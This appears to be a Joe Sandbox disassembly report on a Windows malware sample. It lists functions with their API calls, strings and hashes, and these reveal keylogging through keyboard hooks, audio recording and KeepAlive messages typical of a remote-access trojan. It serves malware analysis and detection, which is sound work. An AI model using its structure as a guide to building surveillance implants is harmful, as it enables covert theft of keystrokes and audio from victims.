                                        • Instruction Fuzzy Hash: 72315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                        APIs
                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ACP$OCP
                                        • API String ID: 0-711371036
                                        • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                        • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                        • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                        • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                        APIs
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417D04
                                          • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D29
                                          • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                          • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                        • String ID: image/png
                                        • API String ID: 1291196975-2966254431
                                        • Opcode ID: 157e3c84acb298c00b8a811f8dbb714bd95cc3abe4333fe7ddc149ff661122fd
                                        • Instruction ID: 1f40aeda14031b83fd9eea2ddee5e82f5a36372f8d90ac1696f7ac499827f772
                                        • Opcode Fuzzy Hash: 157e3c84acb298c00b8a811f8dbb714bd95cc3abe4333fe7ddc149ff661122fd
                                        • Instruction Fuzzy Hash: 4621A135204211AFC300AF61CC88CAFBBBDEFCA755F10052EF90693151DB399945CBA6
                                        APIs
                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                        Strings
                                        • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: KeepAlive | Enabled | Timeout:
                                        • API String ID: 481472006-1507639952
                                        • Opcode ID: 9629856601c2ade6b9171a8da2872b59cbc4edb5dc9735de265d34bbd197e3ce
                                        • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                        • Opcode Fuzzy Hash: 9629856601c2ade6b9171a8da2872b59cbc4edb5dc9735de265d34bbd197e3ce
                                        • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: LG$XG
                                        • API String ID: 0-1482930923
                                        • Opcode ID: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                                        • Instruction ID: 7c4b062fcb32332b9137c766d59a1203f687c3695f5e31fbe0a477c862ff6f2a
                                        • Opcode Fuzzy Hash: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                                        • Instruction Fuzzy Hash: 07110AB5D01714AACF20DFA998017CFB7A55F05725F14D16BEC18EB281D378EB408798
                                        APIs
                                        • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: | $%02i:%02i:%02i:%03i
                                        • API String ID: 481472006-2430845779
                                        • Opcode ID: 7c541b1fe11d74047bf4de15ff6413637149af1765b06644cf8be9994c192f8f
                                        • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                        • Opcode Fuzzy Hash: 7c541b1fe11d74047bf4de15ff6413637149af1765b06644cf8be9994c192f8f
                                        • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412612
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412648
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: QueryValue
                                        • String ID: TUF
                                        • API String ID: 3660427363-3431404234
                                        • Opcode ID: ea05bdfc88d730103140c1813835b768b0c4990d0bb52d9cb4e5ffcfc942b32d
                                        • Instruction ID: c735b93b908d9d71aa6a4d05a3740b5a2597980304af3aa5722c76a25f50973a
                                        • Opcode Fuzzy Hash: ea05bdfc88d730103140c1813835b768b0c4990d0bb52d9cb4e5ffcfc942b32d
                                        • Instruction Fuzzy Hash: B201A2B6A00108BFEB04EB95DD46EFFBABDEF44240F10007AF901E2251E6B4AF009664
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00419EBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: TUF$alarm.wav
                                        • API String ID: 1174141254-147985980
                                        • Opcode ID: bb35db19ecf725e66f50cc2985e16286bdf7f8f1df2ddcf995444714096ddcfa
                                        • Instruction ID: dd13df65ec224498850e23f6f848d4e774319f78d5db457f3497a795ed38963e
                                        • Opcode Fuzzy Hash: bb35db19ecf725e66f50cc2985e16286bdf7f8f1df2ddcf995444714096ddcfa
                                        • Instruction Fuzzy Hash: F301927060420166C604B676D866AEE77418BC1719F50413FF88A966E2EF7C9EC6C2CF
                                        APIs
                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                        • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                        • String ID: Online Keylogger Stopped
                                        • API String ID: 1623830855-1496645233
                                        • Opcode ID: aa2cc70d391a599e14960110e5ba635763145c369873a0ecd25f92c1668795cb
                                        • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                        • Opcode Fuzzy Hash: aa2cc70d391a599e14960110e5ba635763145c369873a0ecd25f92c1668795cb
                                        • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                        APIs
                                        • waveInPrepareHeader.WINMM(007CF5C0,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                        • waveInAddBuffer.WINMM(007CF5C0,00000020,?,00000000,00401913), ref: 0040175D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferHeaderPrepare
                                        • String ID: T=G
                                        • API String ID: 2315374483-379896819
                                        • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                        • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                        • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                        • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                        APIs
                                        • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocaleValid
                                        • String ID: IsValidLocaleName$z=D
                                        • API String ID: 1901932003-2791046955
                                        • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                        • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                        • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                        • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: T=G$T=G
                                        • API String ID: 3519838083-3732185208
                                        • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                        • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                        • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                        • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                        APIs
                                        • GetKeyState.USER32(00000011), ref: 0040AD5B
                                          • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                          • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                          • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                          • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                          • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                        • String ID: [AltL]$[AltR]
                                        • API String ID: 2738857842-2658077756
                                        • Opcode ID: 0fd097a0a4b99d70b02a08e9004214b89ee8ccd3163f9cf7526c1a47b2b50f16
                                        • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                        • Opcode Fuzzy Hash: 0fd097a0a4b99d70b02a08e9004214b89ee8ccd3163f9cf7526c1a47b2b50f16
                                        • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                        APIs
                                        • _free.LIBCMT ref: 00448835
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorFreeHeapLast_free
                                        • String ID: `@$`@
                                        • API String ID: 1353095263-20545824
                                        • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                        • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                        • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                        • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                        APIs
                                        • GetKeyState.USER32(00000012), ref: 0040ADB5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State
                                        • String ID: [CtrlL]$[CtrlR]
                                        • API String ID: 1649606143-2446555240
                                        • Opcode ID: 8f256fbae12a6d1972e20e0d193ff0540306bf2bf736503aba8af0ee0077a29a
                                        • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                        • Opcode Fuzzy Hash: 8f256fbae12a6d1972e20e0d193ff0540306bf2bf736503aba8af0ee0077a29a
                                        • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                        APIs
                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ObjectProcessSingleTerminateWait
                                        • String ID: pth_unenc
                                        • API String ID: 1872346434-4028850238
                                        • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                        • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                        • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                        • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CommandLine
                                        • String ID: 8({
                                        • API String ID: 3253501508-1337158436
                                        • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                        • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                        • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                        • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                        • GetLastError.KERNEL32 ref: 0043FB12
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                        • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                        • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                        • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759